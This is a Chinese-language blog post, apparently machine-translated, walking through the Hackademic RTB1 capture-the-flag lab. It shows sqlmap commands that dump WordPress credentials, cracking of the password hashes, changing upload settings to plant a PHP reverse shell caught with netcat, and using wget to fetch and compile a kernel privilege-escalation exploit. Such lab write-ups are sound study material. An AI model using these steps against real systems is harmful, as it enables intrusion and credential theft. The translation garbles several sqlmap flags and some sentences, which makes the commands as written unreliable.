Kate Li (Taiwan)的部落格

首頁

r00t這個盒子

作者 morcillo 時間 2020-03-09
all

這是一個挑戰,根這個盒子。我們發現了一個叫做Hackademic RTB1的易受攻擊的機器。主要的挑戰是以管理員許可權創建該框的根目錄並捕獲標誌。

首先,我們使用橋接模式網絡設定在VMware中託管易受攻擊的映射。我們的目標已準備好,但我們不知道目標電腦的IP地址。我們知道我們的網絡設定處於橋接模式。這意味著目標機器的IP在我們的範圍內。囙此,我們執行了Nmap ping掃描,以驗證同一網絡中哪些主機處於活動狀態。在Nmap中,鍵入Nmap-sn 192.168.0.*作為命令。

完成Nmap掃描後,我們可以看到找到了三個活動主機。我們發現其中一個IP與我的路由器關聯,另一個用於我的基本電腦,第三個IP(192.168.0.102)是VMware電腦。這意味著192.168.0.102是我們的目標。

我們對目標192.168.0.102進行了Nmap掃描,Nmap-sS-sV 192.168.0.102

掃描結果見上圖。Nmap檢測到兩個埠。一個是SSH的22,它是關閉的,另一個是HTTP的80埠。這意味著系統上正在運行web服務器。Nmap顯示它是Apache httpd 2.2.15。我們試圖從瀏覽器中打開IP以檢查是否託管了web應用程序。

哇哦!確實有一個web應用程序!在加載的網頁中,有“根此框”的超連結。我們按一下它,它加載了主挑戰部分。

正文解釋了挑戰的細節。我們必須訪問根目錄,並讀取“Key.txt”檔案。

所以,挑戰始於從應用程序進入系統的任務。首先,我們必須開始列舉目標是什麼。我們檢查了該頁面的原始程式碼,發現應用程序是用WordPress版本1.5.1.1CMS管理的,這是一個非常舊的版本,它一定有一些已知的漏洞。

我們在穀歌上蒐索有關CMS漏洞的資訊。我們發現了WordPress1.5.1.1的一些漏洞。下麵是SQL注入攻擊。

首先,我們分析了它,以確定它是如何工作的。我們注意到該漏洞在cat參數中注入了一個SQL査詢。囙此,我們知道cat參數容易受到SQL注入的攻擊。接下來,我們必須在應用程序中找到該參數。在網頁中,我們發現有兩個超連結。第一個文字沒有注釋,第二個文字沒有分類。

然後,我們按一下兩個連結,查看URL是否包含動態或靜態參數。在未分類部分,有一個動態參數,即cat。這就是我們要找的參數!我們在參數中注入了一個項,cat

我們收到一條SQL錯誤消息。據說資料庫使用的是MySQL服務器。現在我們有了易受攻擊的參數和資料庫伺服器名稱。我們使用了SQLmap工具,這是執行SQL注入的最佳工具之一。枚舉資料庫的第一個命令是sqlmap.py-u http://192.168.0.102/Hackademic_RTB1/?cat='–dbs–dbms=MySQL–忽略代理

我們找到了三個資料庫。在這三個資料庫中,只有WordPress是主要的敏感資訊資料庫。所以,我們從WordPress中找到了這些表格。枚舉資料庫名稱的命令是sqlmap.py-u http://192.168.0.102/Hackademic_RTB1/?cat='-D wordpress–錶s–忽略代理

運行該命令後,我們找到了9個錶。首先,我們確定了哪個錶有豐富的資訊。我們找到wp_users錶下的用戶。使用sqlmap.py-u http://192.168.0.102/Hackademic_RTB1/從錶中轉儲列?cat='-D wordpress-T wp_users–columns–忽略代理

運行命令後,我們發現wp_users錶中有22列。在列中,我們發現有user_login和user_pass列可用。

要從這兩列轉儲數據,請鍵入sqlmap.py-u http://192.168.0.102/Hackademic_RTB1/?cat='-D wordpress-T wp_users–dump-C user_login,user_pass–忽略代理

運行sqlmap命令後,我們成功地轉儲了錶中的數據,並找到了六個用戶的憑據。我們可以看到純文字的用戶名,但密碼是用散列加密的。

所以,我們去炸大麻。我們使用了線上服務。有很多線上散列破解網站。

六個散列中,五個散列被破解。

我們收集的資訊足以進入這個網站。

接下來,我們需要找到網站WordPress的登入頁面,所以我們運行了burp套件蜘蛛來抓取網站中的所有頁面。

我們在瀏覽器中打開了URL,找到了它。

我們使用所有收集的憑據來驗證哪個用戶具有管理員許可權。那個用戶是喬治·米勒。

登入後,我們瀏覽了WordPress管理控制台,以檢查應用程序的所有功能。我們發現有一個文件上傳功能。

我們選擇了upload選項,我們注意到它只允許jpg、jpeg、gif、png等圖像格式。但是有一個編輯上傳功能的選項。我們點擊了“選項”

在允許的檔案擴展部分,我們添加了php,並將檔案的最大大小新增到1024kb,然後保存更改。現在是時候上傳一個反向shell來訪問機器了。首先,我們下載了一個PHP反向shell,並進行了以下更改。

在IP部分中,設定您的IP地址,在埠區域中,設定系統未使用的任何埠號。更改完成後,上載php檔案。

在上圖中,我們上傳了hack.php。之後,會顯示一條消息,確認檔案已成功上載。它還顯示了訪問上傳文件的確切URL。

我們可以看到上傳的hack.php檔案在wp content資料夾中。我們使用netcat從上傳的php檔案建立反向連接。通過cmd(在Windows中)打開netcat,然後鍵入nc-lvpp<port,這是我們在PHP shell>中給出的。我們用nc-lvpp 4444

如上所示,netcat已經準備就緒,正在監聽埠4444。我們瀏覽了wp content資料夾中上傳的PHP檔案。

我們執行它,並檢查命令提示符以確認netcat正在監聽埠4444

我們進入了目標系統!系統的內核版本也會顯示出來。接下來,我們用ls檢查目錄。

我們的目標在根目錄中。我們試圖用cd root訪問根資料夾。

如上所示,我們沒有訪問根資料夾的許可權。所以,我們必須有權陞級。我們發現目標的作業系統是Fedora,我們找到了它的Linux內核版本。我們在穀歌上蒐索特定於內核的漏洞。我們發現了一些漏洞,所以我們使用wget downloads.securityfocus.com/vulnerabilities/exploits/44219.c將該漏洞下載到目標系統

接下來,我們用gcc 44219.c-o漏洞編譯了這個漏洞

編譯完漏洞之後,我們使用./exploit運行它

系統被成功利用,我們現在可以訪問根資料夾。我們使用whoami命令來驗證我們的特權,它顯示我們有根。我們用cd/root輸入了根目錄。然後,我們使用ls檢查根目錄中的檔案。

我們找到key.txt檔案,這是我們的標誌。我們用cat key.txt打開它,找到了金鑰。

參考文獻:http://vulnhub.com/entry/hackademic_rtb1,17/

http://pentestmonkey.net/tools/web-shell/php-reverse-shell